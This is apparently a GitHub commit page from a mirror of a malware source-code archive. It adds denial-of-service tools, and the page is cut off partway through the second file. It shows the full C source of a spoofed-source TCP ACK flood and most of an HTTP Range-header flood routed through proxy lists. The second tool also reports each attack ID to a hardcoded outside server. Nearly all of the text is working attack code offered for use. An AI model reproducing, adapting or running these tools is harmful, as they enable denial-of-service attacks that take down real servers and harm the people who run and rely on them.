ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2020-10-09 21:56:39 -05:00 committed by GitHub
parent cb8e4ddb00
commit a5fc35f165
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
69 changed files with 14340 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
libs/StonedBootkitFramework.7z Normal file
View File

Binary file not shown.

194
libs/VirTool.DDoS.ACK.c Normal file
View File

@ -0,0 +1,194 @@
/*
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = 1;
tcph->res2 = 0;
tcph->doff = 5;
tcph->ack = 1;
tcph->window = htons(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons (rand() % 20480);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, ":: cant open raw socket. got root?\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons (rand() % 20480);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, ":: motherfucking error.\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
exit(-1);
}
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, ":: sending all the packets..\n");
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

709
libs/VirTool.DDoS.ARME.c Normal file
View File

@ -0,0 +1,709 @@
#include <pthread.h>
#include <sys/resource.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#define RND_CHAR (char)((rand() % 26)+97)
char *useragents[] = {
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
};
#define ATTACKPORT 80
//char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n%s";
char *postformat = "HEAD / HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nRange:bytes=%s\r\nAccept-Encoding: gzip, deflate, compress\r\nConnection: close\r\n\r\n";
char *postpayload;
struct urlparts {
char * name;
char separator[4];
char value[128];
} parts[] = {
{ "scheme", ":" },
{ "userid", "@" },
{ "password", ":" },
{ "host", "//" },
{ "port", ":" },
{ "path", "/" },
{ "param", ";" },
/*{ "query", "?" },*/
{ "fragment", "#" }
};
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
struct urlparts *returnparts[8];
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
struct proxy { char *type; char *ip; int port; int working; };
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
struct list *head = NULL;
char parseError[128];
int parseURL(char *url, struct urlparts **returnpart);
char * strsplit(char * s, char * tok);
char firstpunc(char *s);
int strleft(char * s, int n);
void setupparts();
void freeparts();
char *stristr(const char *String, const char *Pattern);
char *str_replace(char *orig, char *rep, char *with);
char *geturl(char *url, char *useragent, char *ip);
char *ipstr;
unsigned int fnGetIP(char *szHost);
static int rps = 0;
char *fznGenerateRange()
{
char szBytes[12000] = "0-";
char szAdd[12];
for (int i = 0; i <= 1299; i++)
{
sprintf(szAdd, ",5-%d", i);
strcat(szBytes, szAdd);
bzero(szAdd, 12);
}
return szBytes;
}
void *flood(void *par) {
struct list *startpoint = (struct list *)par;
int i;
struct sockaddr_in serverAddr;
signal(SIGPIPE, SIG_IGN);
while(1)
{
int sent = 0;
if(startpoint->data->working == 0)
{
startpoint = startpoint->next;
usleep(10000);
continue;
}
memset(&serverAddr, 0, sizeof(serverAddr));
serverAddr.sin_family = AF_INET;
serverAddr.sin_port = htons(startpoint->data->port);
serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
u_int yes=1;
if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
continue;
}
if(strcmp(startpoint->data->type, "Socks4")==0)
{
unsigned char buf[10];
buf[0] = 0x04;
buf[1] = 0x01;
*(unsigned short*)&buf[2] = htons(ATTACKPORT);
*(unsigned long*)&buf[4] = inet_addr(ipstr);
buf[8] = 0x00;
if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
}
if(strcmp(startpoint->data->type, "Socks5")==0)
{
unsigned char buf[20];
buf[0] = 0x05;
buf[1] = 0x01;
buf[2] = 0x00;
if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
buf[0] = 0x05;
buf[1] = 0x01;
buf[2] = 0x00;
buf[3] = 0x01;
*(unsigned long*)&buf[4] = inet_addr(ipstr);
*(unsigned short*)&buf[8] = htons(ATTACKPORT);
if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
}
if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
{
char *connectrequest = malloc(1024);
bzero(connectrequest, 1024);
sprintf(connectrequest, "CONNECT %s:25565 HTTP/1.0\r\n\r\n", ipstr);
if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
char *recvbuf = malloc(1024);
bzero(recvbuf, 1024);
int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
if(gotbytes < 1)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
free(recvbuf);
}
//char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
//if(httppayload == NULL)
//{
// startpoint = startpoint->next;
// close(serverSocket);
// continue;
//}
//char *tmp = NULL;
//while((tmp = strstr(httppayload, "%RANDOM%"))!=NULL)
/*{
*(tmp) = RND_CHAR;
*(tmp+1) = RND_CHAR;
*(tmp+2) = RND_CHAR;
*(tmp+3) = RND_CHAR;
*(tmp+4) = RND_CHAR;
*(tmp+5) = RND_CHAR;
*(tmp+6) = RND_CHAR;
*(tmp+7) = RND_CHAR;
}
*/
send(serverSocket, postpayload, strlen(postpayload), MSG_NOSIGNAL);
//free(httppayload);
close(serverSocket);
rps++;
usleep(50000);
//startpoint = startpoint->next;
}
}
int fnAttackInformation(int attackID)
{
char szRecvBuff[1024];
char packet[1024];
char ip[] = "37.221.170.5";
snprintf(packet, sizeof(packet) - 1, "GET /~dqyefldi/response.php?auth=tru&id=%d&pro=%d HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nCache-Control: no-cache\r\nOrigin: http://google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\nAccept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n", attackID, getpid(), ip);
struct sockaddr_in *remote;
int sock;
int tmpres;
if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("Can't create TCP socket");
exit(1);
}
remote = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in *));
remote->sin_family = AF_INET;
tmpres = inet_pton(AF_INET, ip, (void *)(&(remote->sin_addr.s_addr)));
if (tmpres < 0)
{
perror("Can't set remote->sin_addr.s_addr");
exit(1);
}
else if (tmpres == 0)
{
fprintf(stderr, "%s is not a valid IP address\n", ip);
exit(1);
}
remote->sin_port = htons(80);
if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0)
{
perror("Could not connect");
exit(1);
}
tmpres = send(sock, packet, strlen(packet), 0);
//printf("Sent %d bytes -> \n%s\n\n\n", tmpres, packet);
if (tmpres == -1){
perror("Can't send query");
exit(1);
}
int i = 1;
int dwTotal = 0;
while (1)
{
i = recv(sock, szRecvBuff + dwTotal, sizeof(szRecvBuff) - dwTotal, 0);
//printf("Received %d bytes\n", i);
if (i <= 0)
break;
dwTotal += i;
}
szRecvBuff[dwTotal] = '\0';
//printf("Received -> \n%s\n\n", szRecvBuff);
close(sock);
//printf("Sent %d bytes\n", tmpres);
return 0;
}
int main(int argc, char *argv[ ]) {
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
exit(-1);
}
//fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
char *method = argv[2];
if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
{
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
exit(-1);
}
FILE *pFile = fopen(argv[4], "rb");
if(pFile==NULL)
{
perror("fopen"); exit(1);
}
fseek(pFile, 0, SEEK_END);
long lSize = ftell(pFile);
rewind(pFile);
char *buffer = (char *)malloc(lSize*sizeof(char));
fread(buffer, 1, lSize, pFile);
fclose (pFile);
int i=0;
char *pch = (char *)strtok(buffer, ":");
while(pch != NULL)
{
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(head, sizeof(struct list));
head->data = (struct proxy *)malloc(sizeof(struct proxy));
bzero(head->data, sizeof(struct proxy));
head->data->working = 1;
head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
pch = (char *)strtok(NULL, ":");
if(pch == NULL) exit(-1);
head->data->port = atoi(pch);
pch = (char *)strtok(NULL, ":");
head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
pch = (char *)strtok(NULL, ":");
head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
bzero(new_node, sizeof(struct list));
new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
bzero(new_node->data, sizeof(struct proxy));
new_node->data->working = 1;
new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
pch = (char *)strtok(NULL, ":");
if(pch == NULL) break;
new_node->data->port = atoi(pch);
pch = (char *)strtok(NULL, ":");
new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
pch = (char *)strtok(NULL, ":");
new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
}
free(buffer);
const rlim_t kOpenFD = 1024 + (num_threads * 2);
struct rlimit rl;
int result;
rl.rlim_cur = kOpenFD;
rl.rlim_max = kOpenFD;
result = setrlimit(RLIMIT_NOFILE, &rl);
if (result != 0)
{
perror("setrlimit");
fprintf(stderr, "setrlimit returned result = %d\n", result);
}
bzero(&rl, sizeof(struct rlimit));
rl.rlim_cur = 256 * 1024;
rl.rlim_max = 4096 * 1024;
result = setrlimit(RLIMIT_STACK, &rl);
if (result != 0)
{
perror("setrlimit_stack");
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
}
setupparts();
parseURL(argv[1], returnparts);
if(argc > 6 && !(strcmp(argv[6], "0") == 0))
{
ipstr = malloc(strlen(argv[6])+1);
bzero(ipstr, strlen(argv[6])+1);
strcpy(ipstr, argv[6]);
//fprintf(stdout, "Using manual IP...\n");
} else {
struct hostent *he;
struct in_addr a;
he = gethostbyname(returnparts[host]->value);
if (he)
{
while (*he->h_addr_list)
{
bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
ipstr = malloc(INET_ADDRSTRLEN+1);
inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
break;
}
}
else
{ herror("gethostbyname"); }
}
char *postdata = malloc(1);
bzero(postdata, 1);
char *extrahead = malloc(1);
bzero(extrahead, 1);
pthread_t thread[num_threads];
postpayload = malloc(12001);
sprintf(postpayload, postformat, returnparts[host]->value, useragents[rand() % 40], fznGenerateRange());
freeparts();
//printf("Packet -> \n%s\n", postpayload);
//return 0;
//fprintf(stdout, "Starting Flood...\n");
fnAttackInformation(atoi(argv[argc-1]));
for(i = 0;i<num_threads;i++){
pthread_create(&thread[i], NULL, &flood, (void *)head);
pthread_detach(thread[i]);
head = head->next;
}
int temp = atoi(argv[5]);
for(i = 0;i<temp;i++)
{
//rps=0;
sleep(1);
//printf("R/s: %d\n", rps);
}
return 0;
}
void freeparts()
{
return;
if(returnparts[0]!=NULL) { free(returnparts[0]); }
if(returnparts[1]!=NULL) { free(returnparts[1]); }
if(returnparts[2]!=NULL) { free(returnparts[2]); }
if(returnparts[3]!=NULL) { free(returnparts[3]); }
if(returnparts[4]!=NULL) { free(returnparts[4]); }
if(returnparts[5]!=NULL) { free(returnparts[5]); }
if(returnparts[6]!=NULL) { free(returnparts[6]); }
if(returnparts[7]!=NULL) { free(returnparts[7]); }
/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
return;
}
void setupparts()
{
returnparts[0] = malloc(sizeof(struct urlparts));
returnparts[1] = malloc(sizeof(struct urlparts));
returnparts[2] = malloc(sizeof(struct urlparts));
returnparts[3] = malloc(sizeof(struct urlparts));
returnparts[4] = malloc(sizeof(struct urlparts));
returnparts[5] = malloc(sizeof(struct urlparts));
returnparts[6] = malloc(sizeof(struct urlparts));
returnparts[7] = malloc(sizeof(struct urlparts));
/*returnparts[8] = malloc(sizeof(struct urlparts));*/
bzero(returnparts[0], sizeof(struct urlparts));
bzero(returnparts[1], sizeof(struct urlparts));
bzero(returnparts[2], sizeof(struct urlparts));
bzero(returnparts[3], sizeof(struct urlparts));
bzero(returnparts[4], sizeof(struct urlparts));
bzero(returnparts[5], sizeof(struct urlparts));
bzero(returnparts[6], sizeof(struct urlparts));
bzero(returnparts[7], sizeof(struct urlparts));
/*bzero(returnparts[8], sizeof(struct urlparts));*/
returnparts[0]->name = "scheme";
strcpy(returnparts[0]->separator, ":");
returnparts[1]->name = "userid";
strcpy(returnparts[1]->separator, "@");
returnparts[2]->name = "password";
strcpy(returnparts[2]->separator, ":");
returnparts[3]->name = "host";
strcpy(returnparts[3]->separator, "//");
returnparts[4]->name = "port";
strcpy(returnparts[4]->separator, ":");
returnparts[5]->name = "path";
strcpy(returnparts[5]->separator, "/");
returnparts[6]->name = "param";
strcpy(returnparts[6]->separator, ";");
/*returnparts[7]->name = "query";
strcpy(returnparts[7]->separator, "?");*/
returnparts[7]->name = "fragment";
strcpy(returnparts[7]->separator, "#");
return;
}
int parseURL(char *url, struct urlparts **returnpart) {
register i;
int seplen;
char * remainder;
//char * regall = ":/;?#";
char * regall = ":/;#";
//char * regpath = ":;?#";
char * regpath = ":;#";
char * regx;
if(!*url)
{
strcpy(parseError, "nothing to do!\n");
return 0;
}
if((remainder = malloc(strlen(url) + 1)) == NULL)
{
printf("cannot allocate memory\n");
exit(-1);
}
strcpy(remainder, url);
if(firstpunc(remainder) == ':')
{
strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
strleft(remainder, 1);
}
if (!strcmp(returnpart[scheme]->value, "mailto"))
*(returnpart[host]->separator) = 0;
for(i = 0; i < NUMPARTS; i++)
{
if(!*remainder)
break;
if(i == scheme || i == userid || i == password)
continue;
if(i == host && strchr(remainder, '@'))
{
if(!strncmp(remainder, "//", 2))
strleft(remainder, 2);
strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
strleft(remainder, 1);
if(strchr(remainder, '@'))
{
strcpy(returnpart[password]->value, strsplit(remainder, "@"));
strleft(remainder, 1);
}
*(returnpart[host]->separator) = 0;
}
if(i == path && (! *(returnpart[scheme]->value)))
{
*(returnpart[path]->separator) = 0;
strcpy(returnpart[scheme]->value, "http");
}
regx = (i == path) ? regpath : regall ;
seplen = strlen(returnpart[i]->separator);
if(strncmp(remainder, returnpart[i]->separator, seplen))
continue;
else
strleft(remainder, seplen);
strcpy(returnpart[i]->value, strsplit(remainder, regx));
}
if(*remainder)
sprintf(parseError, "I don't understand '%s'", remainder);
free(remainder);
return 0;
}
char *str_replace(char *orig, char *rep, char *with) {
char *result;
char *ins;
char *tmp;
int len_rep;
int len_with;
int len_front;
int count;
if (!orig)
return NULL;
if (!rep || !(len_rep = strlen(rep)))
return NULL;
if (!(ins = strstr(orig, rep)))
return NULL;
if (!with)
with = "";
len_with = strlen(with);
for (count = 0; tmp = strstr(ins, rep); ++count) {
ins = tmp + len_rep;
}
tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
if (!result)
return NULL;
while (count--) {
ins = strstr(orig, rep);
len_front = ins - orig;
tmp = strncpy(tmp, orig, len_front) + len_front;
tmp = strcpy(tmp, with) + len_with;
orig += len_front + len_rep;
}
strcpy(tmp, orig);
return result;
}
char *stristr(const char *String, const char *Pattern)
{
char *pptr, *sptr, *start;
uint slen, plen;
for (start = (char *)String,
pptr = (char *)Pattern,
slen = strlen(String),
plen = strlen(Pattern);
slen >= plen;
start++, slen--)
{
while (toupper(*start) != toupper(*Pattern))
{
start++;
slen--;
if (slen < plen)
return(NULL);
}
sptr = start;
pptr = (char *)Pattern;
while (toupper(*sptr) == toupper(*pptr))
{
sptr++;
pptr++;
if ('\0' == *pptr)
return (start);
}
}
return(NULL);
}
char * strsplit(char * s, char * tok) {
#define OUTLEN (255)
register i, j;
static char out[OUTLEN + 1];
for(i = 0; s[i] && i < OUTLEN; i++)
{
if(strchr(tok, s[i]))
break;
else
out[i] = s[i];
}
out[i] = 0;
if(i && s[i])
{
for(j = 0; s[i]; i++, j++) s[j] = s[i];
s[j] = 0;
}
else if (!s[i])
*s = 0;
return out;
}
char firstpunc(char * s) {
while(*s++)
if(!isalnum(*s)) return *s;
return 0;
}
int strleft(char * s, int n) {
int l;
l = strlen(s);
if(l < n)
return -1;
else if (l == n)
*s = 0;
memmove(s, s + n, l - n + 1);
return n;
}
unsigned int fnGetIP(char *szHost) {
static struct in_addr addr;
struct hostent *hHost;
addr.s_addr = inet_addr(szHost);
if(addr.s_addr == -1)
{
hHost = gethostbyname(szHost);
if(hHost == NULL)
{
exit(0);
